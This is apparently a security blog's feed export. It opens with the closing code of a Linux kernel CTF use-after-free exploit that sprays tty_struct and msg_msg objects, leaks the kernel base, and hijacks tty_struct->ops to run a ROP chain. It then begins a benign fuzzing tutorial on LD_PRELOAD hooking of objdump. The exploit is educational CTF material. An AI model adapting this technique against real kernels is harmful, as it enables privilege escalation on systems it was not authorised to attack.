    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; msg_msg.m_list.next: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">next</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; msg_msg.m_list.prev: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">prev</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; msg_msg.m_type: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">m_type</span><span class="p">);</span>

    <span class="c1">// Update rop address</span>
    <span class="n">rop_addr</span> <span class="o">=</span> <span class="mi">48</span> <span class="o">+</span> <span class="n">next</span><span class="p">;</span>
    
    <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">overwrite_ops</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">g_buf</span><span class="p">[</span><span class="n">GBUF_SZ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">g_buf</span><span class="p">,</span> <span class="n">GBUF_SZ</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">GBUF_SZ</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read enough bytes from fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Overwrite the tty_struct-&gt;ops pointer with ROP address</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_buf</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="n">fake_table</span><span class="p">;</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_written</span> <span class="o">=</span> <span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">g_buf</span><span class="p">,</span> <span class="n">GBUF_SZ</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_written</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">GBUF_SZ</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to write enough bytes to fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd1</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd2</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd3</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd4</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd5</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd6</span><span class="p">;</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Saving user space state..."</span><span class="p">);</span>
    <span class="n">save_state</span><span class="p">();</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Freeing fd1..."</span><span class="p">);</span>
    <span class="n">fd1</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">fd2</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd1</span><span class="p">);</span>

    <span class="c1">// Allocate '/dev/ptmx' structs until we allocate one in our free'd slab</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Spraying tty_structs..."</span><span class="p">);</span>
    <span class="kt">size_t</span> <span class="n">p_remain</span> <span class="o">=</span> <span class="n">PTMX_SPRAY</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">p_remain</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">alloc_ptmx</span><span class="p">();</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; tty_struct(s) alloc'd: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">PTMX_SPRAY</span> <span class="o">-</span> <span class="n">p_remain</span><span class="p">);</span>

        <span class="c1">// Check to see if we found one of our tty_structs</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">found_ptmx</span><span class="p">(</span><span class="n">fd2</span><span class="p">))</span> <span class="p">{</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">p_remain</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Failed to find tty_struct"</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Leaking tty_struct-&gt;ops..."</span><span class="p">);</span>
    <span class="n">base</span> <span class="o">=</span> <span class="n">leak_ops</span><span class="p">(</span><span class="n">fd2</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Kernel base: 0x%lx"</span><span class="p">,</span> <span class="n">base</span><span class="p">);</span>

    <span class="c1">// Clean up open fds</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Cleaning up our tty_structs..."</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">num_ptmx</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">close</span><span class="p">(</span><span class="n">open_ptmx</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
        <span class="n">open_ptmx</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">num_ptmx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// Solve the gadget addresses now that we have base</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Solving gadget addresses"</span><span class="p">);</span>
    <span class="n">solve_gadgets</span><span class="p">();</span>

    <span class="c1">// Create a hole for a msg_msg</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Freeing fd3..."</span><span class="p">);</span>
    <span class="n">fd3</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">fd4</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd3</span><span class="p">);</span>

    <span class="c1">// Allocate msg_msg structs until we allocate one in our free'd slab</span>
    <span class="kt">size_t</span> <span class="n">q_remain</span> <span class="o">=</span> <span class="n">NUM_QUEUE</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">fails</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">q_remain</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Initialize a message queue for spraying msg_msg structs</span>
        <span class="n">init_msg_q</span><span class="p">();</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; msg_msg queue(s) initialized: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
            <span class="n">NUM_QUEUE</span> <span class="o">-</span> <span class="n">q_remain</span><span class="p">);</span>
        
        <span class="c1">// Spray messages for this queue</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">MSG_SPRAY</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">fails</span> <span class="o">+=</span> <span class="n">send_message</span><span class="p">();</span>
        <span class="p">}</span>

        <span class="c1">// Check to see if we found a msg_msg struct</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">found_msg</span><span class="p">(</span><span class="n">fd4</span><span class="p">))</span> <span class="p">{</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
        
        <span class="k">if</span> <span class="p">(</span><span class="n">q_remain</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Failed to find msg_msg struct"</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>
    
    <span class="c1">// Solve our ROP chain address</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"`msgsnd()` failures: %lu"</span><span class="p">,</span> <span class="n">fails</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"ROP chain address: 0x%lx"</span><span class="p">,</span> <span class="n">rop_addr</span><span class="p">);</span>
    <span class="n">fake_table</span> <span class="o">=</span> <span class="n">rop_addr</span> <span class="o">+</span> <span class="n">rop_len</span><span class="p">;</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Fake tty_struct-&gt;ops function table: 0x%lx"</span><span class="p">,</span> <span class="n">fake_table</span><span class="p">);</span>
    <span class="n">ioctl_ptr</span> <span class="o">=</span> <span class="n">fake_table</span> <span class="o">+</span> <span class="n">ioctl_off</span><span class="p">;</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Fake ioctl() handler: 0x%lx"</span><span class="p">,</span> <span class="n">ioctl_ptr</span><span class="p">);</span>

    <span class="c1">// Do a 3rd UAF</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Freeing fd5..."</span><span class="p">);</span>
    <span class="n">fd5</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">fd6</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd5</span><span class="p">);</span>

    <span class="c1">// Spray more /dev/ptmx terminals</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Spraying tty_structs..."</span><span class="p">);</span>
    <span class="n">p_remain</span> <span class="o">=</span> <span class="n">PTMX_SPRAY</span><span class="p">;</span>
    <span class="k">while</span><span class="p">(</span><span class="n">p_remain</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">alloc_ptmx</span><span class="p">();</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; tty_struct(s) alloc'd: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">PTMX_SPRAY</span> <span class="o">-</span> <span class="n">p_remain</span><span class="p">);</span>

        <span class="c1">// Check to see if we found a tty_struct</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">found_ptmx</span><span class="p">(</span><span class="n">fd6</span><span class="p">))</span> <span class="p">{</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">p_remain</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Failed to find tty_struct"</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Found new tty_struct"</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Overwriting tty_struct-&gt;ops pointer with fake table..."</span><span class="p">);</span>
    <span class="n">overwrite_ops</span><span class="p">(</span><span class="n">fd6</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Overwrote tty_struct-&gt;ops"</span><span class="p">);</span>

    <span class="c1">// Spam IOCTL on all of our '/dev/ptmx' fds</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Spamming `ioctl()`..."</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">num_ptmx</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">ioctl</span><span class="p">(</span><span class="n">open_ptmx</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="mh">0xcafebabe</span><span class="p">,</span> <span class="n">rop_addr</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="c1">// pop rbp; ret;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="Linux kernel" /><category term="Pwn" /><category term="UAF" /><category term="Tutorial" /><category term="CTF" /><category term="Walkthrough" /><summary type="html"><![CDATA[Introduction]]></summary></entry><entry><title type="html">Fuzzing Like A Caveman 6: Binary Only Snapshot Fuzzing Harness</title><link href="https://h0mbre.github.io/Fuzzing-Like-A-Caveman-6/" rel="alternate" type="text/html" title="Fuzzing Like A Caveman 6: Binary Only Snapshot Fuzzing Harness" /><published>2022-04-02T00:00:00+00:00</published><updated>2022-04-02T00:00:00+00:00</updated><id>https://h0mbre.github.io/Fuzzing-Like-A-Caveman-6</id><content type="html" xml:base="https://h0mbre.github.io/Fuzzing-Like-A-Caveman-6/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>It’s been a while since I’ve done one of these, and one of my goals this year is to do more, so here we are. A side project of mine is kind of reaching a good stopping point so I’ll have more free time to do my own research and blog again. Looking forward to sharing more and more this year.</p>

<p>One of the most common questions that comes up in beginner fuzzing circles (of which I’m obviously a member) is how to harness a target so that it can be fuzzed in memory, or as some would call it, in ‘persistent’ fashion, in order to gain performance. Persistent fuzzing has a niche use case where the target doesn’t touch much global state from fuzzcase to fuzzcase; an example would be a tight fuzzing loop for a single API in a library, or maybe a single function in a binary.</p>

<p>This style of fuzzing is faster than re-executing the target from scratch over and over as we bypass all the heavy syscalls/kernel routines associated with creating and destroying task structs.</p>
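<p>To make that concrete, here’s a minimal sketch of what a persistent loop looks like. Everything in it is made up for illustration: <code class="language-plaintext highlighter-rouge">parse_record</code> is a hypothetical stand-in for the single API you’d be fuzzing, and the “mutator” is just <code class="language-plaintext highlighter-rouge">rand()</code>. The only point is that one process runs many fuzzcases back to back without ever paying for process creation and teardown.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdint.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

#define ITERATIONS 100000

/* Hypothetical target: stands in for the single API we want to fuzz. */
static int parse_record(const uint8_t *buf, size_t len) {
    if (len &lt; 4) {
        return -1;
    }
    return memcmp(buf, "FUZZ", 4) == 0 ? 1 : 0;
}

int main(void) {
    uint8_t input[16] = { 'F', 'U', 'Z', 'A' };
    size_t hits = 0;

    srand(1); /* fixed seed so runs are repeatable */

    /* One process, many fuzzcases: nothing is re-executed per iteration */
    for (size_t i = 0; i &lt; ITERATIONS; i++) {
        /* Toy mutation: overwrite one random byte of the in-memory input */
        input[(size_t)rand() % sizeof(input)] = (uint8_t)rand();

        if (parse_record(input, sizeof(input)) == 1) {
            hits++;
        }
    }

    printf("iterations: %d, hits: %zu\n", ITERATIONS, hits);
    return 0;
}
</code></pre></div></div>
<p>Notice that nothing here resets state between iterations, which is exactly why this style only works well when the target barely touches global state.</p>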

<p>However, with binary targets for which we don’t have source code, it’s sometimes hard to discern what global state we’re affecting while executing any code path without some heavy reverse engineering (disgusting, work? gross). Additionally, we often want to fuzz a wider loop. It doesn’t do us much good to fuzz a function which returns a struct that is then never read or consumed in our fuzzing workflow. With these things in mind, we often find that ‘snapshot’ fuzzing would be a more robust workflow for binary targets, or even production binaries for which we have source, but which have gone through the sausage factory of enterprise build systems.</p>

<p>So today, we’re going to learn how to take an arbitrary binary-only target that takes an input file from the user and turn it into a target that takes its input from memory instead and lends itself well to having its state reset between fuzzcases.</p>
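<p>As a rough mental model of those two properties (input from memory, state reset between fuzzcases), here’s a toy sketch. It is not how a real snapshot fuzzer is built; a real one restores all of the target’s writable memory and register state, not one struct. The names <code class="language-plaintext highlighter-rouge">target_state</code>, <code class="language-plaintext highlighter-rouge">target_run</code>, and <code class="language-plaintext highlighter-rouge">run_case</code> are all hypothetical.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

/* Hypothetical global state that the target dirties while it runs */
struct target_state {
    size_t bytes_seen;
    char last_tag[8];
};

static struct target_state g_state;
static struct target_state g_snapshot;

/* Hypothetical target routine: consumes its input straight from memory */
static void target_run(const unsigned char *input, size_t len) {
    size_t n = len;
    if (n &gt; sizeof(g_state.last_tag) - 1) {
        n = sizeof(g_state.last_tag) - 1;
    }

    g_state.bytes_seen += len;
    memcpy(g_state.last_tag, input, n);
    g_state.last_tag[n] = '\0';
}

/* Run one fuzzcase, report what the target saw, then restore the snapshot */
static size_t run_case(const unsigned char *input, size_t len) {
    target_run(input, len);
    size_t seen = g_state.bytes_seen;
    g_state = g_snapshot; /* reset state for the next fuzzcase */
    return seen;
}

int main(void) {
    /* Take the snapshot once, before any fuzzcase has run */
    g_snapshot = g_state;

    printf("case 0: bytes_seen=%zu\n", run_case((const unsigned char *)"AAAA", 4));
    printf("case 1: bytes_seen=%zu\n", run_case((const unsigned char *)"BBBBBB", 6));
    printf("after reset: bytes_seen=%zu\n", g_state.bytes_seen);
    return 0;
}
</code></pre></div></div>
<p>Because the state is restored after every case, the second case sees a byte count of 6 rather than 10; each fuzzcase starts from the same place.</p>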

<h2 id="target-easy-mode">Target (Easy Mode)</h2>
<p>For the purposes of this blogpost, we’re going to harness objdump to be snapshot fuzzed. This will serve our purposes because it’s relatively simple (single threaded, single process) and it’s a common fuzzing target, especially as people do development work on their fuzzers. The point of this is not to impress you by sandboxing some insane target like Chrome, but to show beginners how to start thinking about harnessing. You want to lobotomize your targets so that they are unrecognizable to their original selves but retain the same semantics. You can get as creative as you want, and honestly, sometimes harnessing targets is some of the most satisfying work related to fuzzing. It feels great to successfully sandbox a target and have it play nice with your fuzzer. On to it then.</p>

<h2 id="hello-world">Hello World</h2>
<p>The first step is to determine how we want to change objdump’s behavior. Let’s try running it under <code class="language-plaintext highlighter-rouge">strace</code> and disassemble <code class="language-plaintext highlighter-rouge">ls</code> and see how it behaves at the syscall level with <code class="language-plaintext highlighter-rouge">strace objdump -D /bin/ls</code>. What we’re looking for is the point where <code class="language-plaintext highlighter-rouge">objdump</code> starts interacting with our input, <code class="language-plaintext highlighter-rouge">/bin/ls</code> in this case. In the output, if you scroll down past the boilerplate stuff, you can see the first appearance of <code class="language-plaintext highlighter-rouge">/bin/ls</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
openat(AT_FDCWD, "/bin/ls", O_RDONLY)   = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
</code></pre></div></div>
<p><strong><em>Keep in mind that as you read through this, if you’re following along at home, your output might not match mine exactly. I’m likely on a different distribution than you, running a different objdump than you. But the point of the blogpost is just to show concepts that you can get creative with on your own.</em></strong></p>

<p>I also noticed that the program doesn’t close our input file until the end of execution:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>read(3, "\0\0\0\0\0\0\0\0\10\0\"\0\0\0\0\0\1\0\0\0\377\377\377\377\1\0\0\0\0\0\0\0"..., 4096) = 2720
write(1, ":(%rax)\n  21ffa4:\t00 00         "..., 4096) = 4096
write(1, "x0,%eax\n  220105:\t00 00         "..., 4096) = 4096
close(3)                                = 0
write(1, "023e:\t00 00                \tadd "..., 2190) = 2190
exit_group(0)                           = ?
+++ exited with 0 +++
</code></pre></div></div>

<p>This is good to know: we’ll need our harness to be able to emulate an input file fairly well, since objdump doesn’t just read our file into a memory buffer in one shot or <code class="language-plaintext highlighter-rouge">mmap()</code> the input file. It is continuously reading from the file throughout the <code class="language-plaintext highlighter-rouge">strace</code> output.</p>
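<p>As a rough sketch of what “emulating an input file” means in practice, here is a minimal in-memory file with a cursor whose read routine follows <code class="language-plaintext highlighter-rouge">read()</code> semantics (short reads, and 0 at end of file). The names <code class="language-plaintext highlighter-rouge">mem_file_t</code> and <code class="language-plaintext highlighter-rouge">mem_read</code> are hypothetical and only here for illustration. A real harness would also have to cover seeking and whatever other file calls the target makes.</p>

```c
#include <assert.h>    /* assert */
#include <stddef.h>    /* size_t */
#include <string.h>    /* memcpy */
#include <sys/types.h> /* ssize_t */

// Hypothetical in-memory "file": a buffer, its length, and a read cursor
typedef struct {
    const unsigned char *data;
    size_t size;
    size_t offset;
} mem_file_t;

// Copy up to count bytes from the cursor, advance it, return bytes copied.
// Returns 0 once the cursor reaches the end, like read() at end of file.
ssize_t mem_read(mem_file_t *f, void *buf, size_t count) {
    assert(f != NULL && buf != NULL);

    // Nothing left to hand out
    if (f->offset >= f->size) {
        return 0;
    }

    // Short read if the caller asks for more than what remains
    size_t remaining = f->size - f->offset;
    size_t n = count < remaining ? count : remaining;

    memcpy(buf, f->data + f->offset, n);
    f->offset += n;

    return (ssize_t)n;
}
```

<p>Because the cursor lives in the struct, repeated calls walk through the buffer the same way objdump’s repeated <code class="language-plaintext highlighter-rouge">read()</code> calls walk through the real file.</p>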

<p>Since we don’t have source code for the target, we’re going to affect behavior by using an <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> shared object. By using an <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> shared object, we should be able to hook the wrapper functions around the syscalls that interact with our input file and change their behavior to suit our purposes. If you are unfamiliar with dynamic linking or <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code>, this would be a good stopping point to go Google around for more information (here is a <a href="https://tbrindus.ca/correct-ld-preload-hooking-libc/">great starting point</a>). For starters, let’s just get a <em>Hello, World!</em> shared object loaded.</p>

<p>We can utilize <code class="language-plaintext highlighter-rouge">gcc</code> <a href="https://gcc.gnu.org/onlinedocs/gcc/Function-Attributes.html">Function Attributes</a> to have our shared object execute code when it is loaded by the target by leveraging the <code class="language-plaintext highlighter-rouge">constructor</code> attribute.</p>

<p>So our code so far will look like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
</span>
<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** LD_PRELOAD shared object loaded!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I added the compiler flags needed to compile to the top of the file as a comment. I got these flags from this blogpost on using <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> shared objects a while ago: https://tbrindus.ca/correct-ld-preload-hooking-libc/.</p>

<p>We can now use the <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> environment variable and run objdump with our shared object which should print when loaded:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D /bin/ls &gt; /tmp/output.txt &amp;&amp; head -n 20 /tmp/output.txt
** LD_PRELOAD shared object loaded!

/bin/ls:     file format elf64-x86-64


Disassembly of section .interp:

0000000000000238 &lt;.interp&gt;:
 238:   2f                      (bad)  
 239:   6c                      ins    BYTE PTR es:[rdi],dx
 23a:   69 62 36 34 2f 6c 64    imul   esp,DWORD PTR [rdx+0x36],0x646c2f34
 241:   2d 6c 69 6e 75          sub    eax,0x756e696c
 246:   78 2d                   js     275 &lt;_init@@Base-0x34e3&gt;
 248:   78 38                   js     282 &lt;_init@@Base-0x34d6&gt;
 24a:   36 2d 36 34 2e 73       ss sub eax,0x732e3436
 250:   6f                      outs   dx,DWORD PTR ds:[rsi]
 251:   2e 32 00                xor    al,BYTE PTR cs:[rax]

Disassembly of section .note.ABI-tag:
</code></pre></div></div>

<p>It works, now we can start looking for functions to hook.</p>

<h2 id="looking-for-hooks">Looking for Hooks</h2>
<p>The first thing we need to do is create a fake file name to give objdump so that we can start testing things out. We will copy <code class="language-plaintext highlighter-rouge">/bin/ls</code> into the current working directory and call it <code class="language-plaintext highlighter-rouge">fuzzme</code>. This will allow us to generically play around with the harness for testing purposes. From our <code class="language-plaintext highlighter-rouge">strace</code> output, we know that objdump calls <code class="language-plaintext highlighter-rouge">stat()</code> on the path for our input file (<code class="language-plaintext highlighter-rouge">/bin/ls</code>) a couple of times before we get that call to <code class="language-plaintext highlighter-rouge">openat()</code>. Since we know our file hasn’t been opened yet, and the syscall uses the path for the first arg, we can guess that this syscall results from the libc exported wrapper function for <code class="language-plaintext highlighter-rouge">stat()</code> or <code class="language-plaintext highlighter-rouge">lstat()</code>. I’m going to assume <code class="language-plaintext highlighter-rouge">stat()</code> since we aren’t dealing with any symbolic links for <code class="language-plaintext highlighter-rouge">/bin/ls</code> on my box. We can add a hook for <code class="language-plaintext highlighter-rouge">stat()</code> to test whether we hit it and check if it’s being called for our target input file (now changed to <code class="language-plaintext highlighter-rouge">fuzzme</code>).</p>

<p>In order to create a hook, we will follow a pattern where we define a function pointer type for the real function via a <code class="language-plaintext highlighter-rouge">typedef</code> and then initialize a pointer of that type as <code class="language-plaintext highlighter-rouge">NULL</code>. Once we need to resolve the location of the <strong>real</strong> function we are hooking, we can use <code class="language-plaintext highlighter-rouge">dlsym(RTLD_NEXT, &lt;symbol name&gt;)</code> to get its location and change the pointer value to the real symbol address. (This will be more clear later on).</p>

<p>Now we need to hook <code class="language-plaintext highlighter-rouge">stat()</code> which appears as a <code class="language-plaintext highlighter-rouge">man 3</code> entry <a href="https://linux.die.net/man/3/stat">here</a> (meaning it’s a libc exported function) as well as a <code class="language-plaintext highlighter-rouge">man 2</code> entry (meaning it is a syscall). This was confusing to me for the longest time and I often misunderstood how syscalls actually worked because of this insistence on naming collisions. You can read one of the first research blogposts I ever did <a href="https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/">here</a> where the confusion is palpable and I often make erroneous claims. (PS, I’ll never edit the old blogposts with errors in them, they are like time capsules, and it’s kind of cool to me).</p>

<p>We want to write a function that when called, simply prints something and exits so that we know our hook was hit. For now, our code looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET "fuzzme"
</span>
<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">stat_t</span><span class="p">)(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="kr">restrict</span> <span class="n">path</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="kr">restrict</span> <span class="n">buf</span><span class="p">);</span>
<span class="n">stat_t</span> <span class="n">real_stat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Hook function, objdump will call this stat instead of the real one</span>
<span class="kt">int</span> <span class="nf">stat</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="kr">restrict</span> <span class="n">path</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="kr">restrict</span> <span class="n">buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** stat() hook!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

